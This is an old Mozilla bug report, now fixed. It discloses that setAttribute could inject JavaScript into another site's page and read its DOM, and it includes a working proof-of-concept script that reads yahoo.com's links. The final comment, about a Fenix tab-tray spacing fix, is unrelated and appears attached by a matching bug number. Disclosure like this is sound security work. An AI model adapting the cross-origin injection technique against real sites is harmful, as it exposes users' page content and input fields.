15757 - [DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName

Status: VERIFIED FIXED

(Core :: Security, defect, P3)

Description

[joro]

It is possible to include JavaScript code in any HTML page using setAttribute
and getElementsByTagName.
This exposes the whole DOM of the target document, including content, input
fields, links, etc.
I use the "onunload" body event, but probably there are others ways.
The code is:
--------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
setTimeout("r=a.document.getElementsByTagName('BODY')[0];r.setAttribute('onunloa
d','s=\"Here are some links:   \"; for(i=0;i< ( (document.links.length < 10) ?
document.links.length : 10) ;i++) s += document.links[i].href
+String.fromCharCode(10);alert(s)')",10000);
</SCRIPT>
--------------------------------------

Comment 1

[Norris Boyd]

Marking dogfood for analysis by PDT at jar's request.

Comment 2

[Norris Boyd]

Very ingenious. I think setAttribute should be subject to the same origin policy
check.

Comment 3

[leger]

Putting on PDT+ radar.

Comment 4

[dshea]

Windows NT (1999112908) Com:
Javascript Error: uncaught exception: [Exception... "Security error" code:
"1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location:
"http://www.nat.bg/~joro/mozilla/createel.html Line: 16"]

Comment 5

[leger]

Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.

Comment 6

[Pulsebot]

Pushed by ffxbld-merge:
https://hg.mozilla.org/releases/mozilla-beta/rev/7de89affaf88
[fenix] For https://github.com/mozilla-mobile/fenix/issues/15757 - Avoid the double spacing issues for grid items in tabs tray